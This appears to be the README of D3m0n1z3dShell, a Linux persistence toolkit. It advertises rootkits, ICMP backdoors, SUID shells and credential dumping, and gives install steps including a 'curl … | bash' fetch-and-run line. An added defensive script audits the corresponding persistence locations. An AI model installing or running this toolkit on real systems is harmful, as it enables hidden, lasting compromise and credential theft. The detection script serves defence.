D3m0n1z3dShell: Advanced Tool for persistence in Linux

Linux persistence

D3m0n1z3dShell

Demonized Shell is an advanced tool for persistence in Linux.

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit with file encoder, persistent ICMP backdoor, and other features
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling, and Other Binaries.
  • Process Injection
  • One-line install, for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • ELF/Rootkit Anti-Reversing Technique
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
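
For defenders, a triage script over the file-system locations that the file-based features above correspond to. This is an added example, not part of the D3m0n1z3dShell project: the paths are common Linux defaults (an assumption, not read from the tool's source), and the function names flag_matches and audit_persistence are hypothetical.

```sh
#!/bin/sh
# Added example: defensive triage of the persistence locations listed above.
# Paths are common Linux defaults (assumed), not taken from the tool's source.

# flag_matches LABEL REGEX PATH: print "LABEL<TAB>file" for files matching REGEX.
flag_matches() {
    [ -e "$3" ] || return 0
    grep -rlE -- "$2" "$3" 2>/dev/null |
        while IFS= read -r f; do printf '%s\t%s\n' "$1" "$f"; done
}

# audit_persistence ROOT [DAYS]
#   ROOT: "/" on a live host, or the mount point of a disk image.
#   DAYS: report watched files modified within this many days (default 7).
# Prints one "category<TAB>path" line per finding, for manual review.
audit_persistence() (
    root="${1%/}"; days="${2:-7}"
    # System-wide: crontab, root-level systemd, rc.local, init.d, motd, shell rc.
    set -- etc/crontab etc/cron.d var/spool/cron etc/systemd/system etc/rc.local \
        etc/init.d etc/update-motd.d etc/bash.bashrc etc/profile.d
    # Per-user: SSH keys, user-level systemd units, bashrc.
    for h in "$root"/root "$root"/home/*; do
        [ -d "$h" ] || continue
        h=${h#"$root"/}
        set -- "$@" "$h/.ssh" "$h/.config/systemd/user" "$h/.bashrc"
    done
    for p in "$@"; do
        [ -e "$root/$p" ] || continue
        find "$root/$p" -type f -mtime "-$days" -exec printf 'recent\t%s\n' {} \;
    done
    # APT/dpkg hook directives run a command on every package operation.
    flag_matches apt-hook '(Pre|Post)-Invoke' "$root/etc/apt/apt.conf.d"
    # sudo configured to pass LD_PRELOAD through, or a system-wide preload file.
    flag_matches sudo-env-keep 'env_keep.*LD_PRELOAD' "$root/etc/sudoers"
    flag_matches sudo-env-keep 'env_keep.*LD_PRELOAD' "$root/etc/sudoers.d"
    if [ -s "$root/etc/ld.so.preload" ]; then
        printf 'ld-preload\t%s\n' "$root/etc/ld.so.preload"
    fi
    # Set-uid shells, matched by file name only (a renamed copy is missed).
    find "${root:-/}" -xdev -type f -perm -4000 \
        \( -name 'bash*' -o -name sh -o -name dash \) \
        -exec printf 'suid-shell\t%s\n' {} \; 2>/dev/null || true
)

# Run against the given root when called with arguments, e.g.: sh audit.sh / 3
if [ "$#" -gt 0 ]; then audit_persistence "$@"; fi
```

The kernel-module and process-injection features are not visible in a file listing, and a loaded rootkit can hide files from the live host, so the script is best run against a disk image mounted on a trusted system.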

Pending Features

  • LD_PRELOAD Rootkit
  • Intercept Syscall Write from a file
  • PAM Backdoor
  • Persistence via php webshell and aspx webshell

Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

Copyright (C) 2024 MatheuZSecurity